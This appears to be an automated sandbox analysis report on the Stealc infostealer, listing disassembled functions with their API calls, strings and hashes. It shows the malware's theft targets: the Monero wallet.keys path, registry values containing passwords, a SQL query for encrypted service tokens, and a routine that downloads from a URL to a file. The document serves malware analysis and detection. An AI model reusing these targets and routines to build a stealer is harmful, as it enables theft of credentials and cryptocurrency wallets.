.keys, xrefs: 00CA136B

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: e81d9d2c5fa120842234e4ce2cc2aa58d699b0fa7feb7e4b312d58e191ce54d7
Instruction ID: 0ee21f16a5bb18beade9e3606fc85d7ab328f018f9126d2d98a21f7392fb9374
Opcode Fuzzy Hash: e81d9d2c5fa120842234e4ce2cc2aa58d699b0fa7feb7e4b312d58e191ce54d7
Instruction Fuzzy Hash: 405145B1D501196BCB15FB60DD96FED737CAF54300F4041ACB64AA6082EE306B89DFA6

Function 00CA75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA72D0: memset.MSVCRT ref: 00CA7314
Part of subcall function 00CA72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00CA7C90), ref: 00CA733A
Part of subcall function 00CA72D0: RegEnumValueA.ADVAPI32(00CA7C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CA73B1
Part of subcall function 00CA72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CA740D
Part of subcall function 00CA72D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00CA7C90,80000001,00CB61C4,?,?,?,?,?,00CA7C90,?), ref: 00CA7452
Part of subcall function 00CA72D0: HeapFree.KERNEL32(00000000,?,?,?,?,00CA7C90,80000001,00CB61C4,?,?,?,?,?,00CA7C90,?), ref: 00CA7459

lstrcatA.KERNEL32(330DB020,00CC17FC,00CA7C90,80000001,00CB61C4,?,?,?,?,?,00CA7C90,?,?,00CB61C4), ref: 00CA7606
lstrcatA.KERNEL32(330DB020,00000000,00000000), ref: 00CA7648
lstrcatA.KERNEL32(330DB020, : ), ref: 00CA765A
lstrcatA.KERNEL32(330DB020,00000000,00000000,00000000), ref: 00CA768F
lstrcatA.KERNEL32(330DB020,00CC1804), ref: 00CA76A0
lstrcatA.KERNEL32(330DB020,00000000,00000000,00000000), ref: 00CA76D3
lstrcatA.KERNEL32(330DB020,00CC1808), ref: 00CA76ED
task.LIBCPMTD ref: 00CA76FB

Strings

: , xrefs: 00CA764E

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: efa32d2ceebc3a1d4a8ae012e5535fcfaf33673dbdd4fedfbf2d0415e4d76d20
Instruction ID: 8d7cc07ef2ed141f60d76601585c9edaf58a100fb505d9ad502b939f007f6357
Opcode Fuzzy Hash: efa32d2ceebc3a1d4a8ae012e5535fcfaf33673dbdd4fedfbf2d0415e4d76d20
Instruction Fuzzy Hash: 463110B1D0014EDFCB08EBA5DC9AEFE7779BB46305B18412CF102BB191DA34A94ADB51

Function 00CA72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00CA7314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00CA7C90), ref: 00CA733A
RegEnumValueA.ADVAPI32(00CA7C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CA73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CA740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00CA7C90,80000001,00CB61C4,?,?,?,?,?,00CA7C90,?), ref: 00CA7452
HeapFree.KERNEL32(00000000,?,?,?,?,00CA7C90,80000001,00CB61C4,?,?,?,?,?,00CA7C90,?), ref: 00CA7459

Part of subcall function 00CA9240: vsprintf_s.MSVCRT ref: 00CA925B

task.LIBCPMTD ref: 00CA7555

Strings

Password, xrefs: 00CA7401

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 5768be916cc2a48c6c117b9dd52df264c7747221652cb851bd23fa6ac29ab072
Instruction ID: 4c77c5266674ff209a54e7396fb56ed6e18b8ef643055c3050cb45fa1ecd55d0
Opcode Fuzzy Hash: 5768be916cc2a48c6c117b9dd52df264c7747221652cb851bd23fa6ac29ab072
Instruction Fuzzy Hash: 63614AB5D0016D9BDB24DB50CC45BDAB7B8BF49304F0082E9E689A6141EF706BC9DFA1

Function 00CB7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CB7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7603
HeapAlloc.KERNEL32(00000000), ref: 00CB760A
wsprintfA.USER32 ref: 00CB7640

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Strings

C, xrefs: 00CB754C
:, xrefs: 00CB755C
\, xrefs: 00CB7560

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 83a966d59de635146385181dc2708c8775676a659d7bcbd10076bcf98bd192c5
Instruction ID: 915a4fff43fbbfa63e48397389c6c7e686254387625858f9746856247c7c5782
Opcode Fuzzy Hash: 83a966d59de635146385181dc2708c8775676a659d7bcbd10076bcf98bd192c5
Instruction Fuzzy Hash: BE4182B1D04258AFDF10DFA4DC95BEEBBB8AF58700F140199F5097B280DB746A48CBA5

Function 00CB8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008001F0,00000000,?,00CC0E2C,00000000,?,00000000), ref: 00CB8130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008001F0,00000000,?,00CC0E2C,00000000,?,00000000,00000000), ref: 00CB8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00CB8158
__aulldiv.LIBCMT ref: 00CB8172
__aulldiv.LIBCMT ref: 00CB8180
wsprintfA.USER32 ref: 00CB81AC

Strings

%d MB, xrefs: 00CB81A3
@, xrefs: 00CB814D

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 02aa4ec15786fc65b60c9de7725aac0d695b0d8af22800933bd8edf38fb274d3
Instruction ID: 31caa6569161740587978e5493ca3644df0d1ef240cc5dc5a8fc61fbd6d16a4f
Opcode Fuzzy Hash: 02aa4ec15786fc65b60c9de7725aac0d695b0d8af22800933bd8edf38fb274d3
Instruction Fuzzy Hash: F7211AB1E44258ABDB04DFD5CC49FAEBBBCFB44B10F104619F605BB280D77869058BA5

Function 00CA60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA47EA
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4801
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4818
Part of subcall function 00CA47B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849

InternetOpenA.WININET(00CC0DF7,00000001,00000000,00000000,00000000), ref: 00CA610F
StrCmpCA.SHLWAPI(?,007FD3E8), ref: 00CA6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00CA618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00CA61B3
InternetReadFile.WININET(00CB2B61,?,00000400,?), ref: 00CA61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CA620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00CA6249
InternetCloseHandle.WININET(00CB2B61), ref: 00CA6253
InternetCloseHandle.WININET(00000000), ref: 00CA6260

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: d63a72c7af81fe699422baca31e658f1f05710b4f3ebfb50de4539cab7f96385
Instruction ID: 3455068355f9ffbf83a2e50df7f806e9def56375401337a7545763830316ac6a
Opcode Fuzzy Hash: d63a72c7af81fe699422baca31e658f1f05710b4f3ebfb50de4539cab7f96385
Instruction Fuzzy Hash: B4518FB1900219AFDB20DFA1CC85BEE77B8EB04305F1481A8B605BB1C0DB746A89CF95

Function 00CB70D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00CB70DE

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

OpenProcess.KERNEL32(001FFFFF,00000000,00CB730D,00CC05BD), ref: 00CB711C
memset.MSVCRT ref: 00CB716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 00CB72BE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00CB718C

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: b656ef54272de3d4b2b1820ebfff5ff505132c84baac03ffc0323e706cdc5261
Instruction ID: aeae30795911f9974662e1a876f3a20787b1fbd1367465c6fb40f979e76ce645
Opcode Fuzzy Hash: b656ef54272de3d4b2b1820ebfff5ff505132c84baac03ffc0323e706cdc5261
Instruction Fuzzy Hash: 7A514FB0C04219EFDB24EBA4DC95BEEB774AF44304F1041A8E51977181EB746E88DF65

Function 00CABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA9E10: memcmp.MSVCRT ref: 00CA9E2D

lstrlenA.KERNEL32(00000000), ref: 00CABC9F

Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 00CABCCD
lstrlenA.KERNEL32(00000000), ref: 00CABDA5
lstrlenA.KERNEL32(00000000), ref: 00CABDB9

Strings

AccountId, xrefs: 00CABCC4
AccountTokens, xrefs: 00CABABA
AccountTokens, xrefs: 00CABB49
SELECT service, encrypted_token FROM token_service, xrefs: 00CABBEB

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
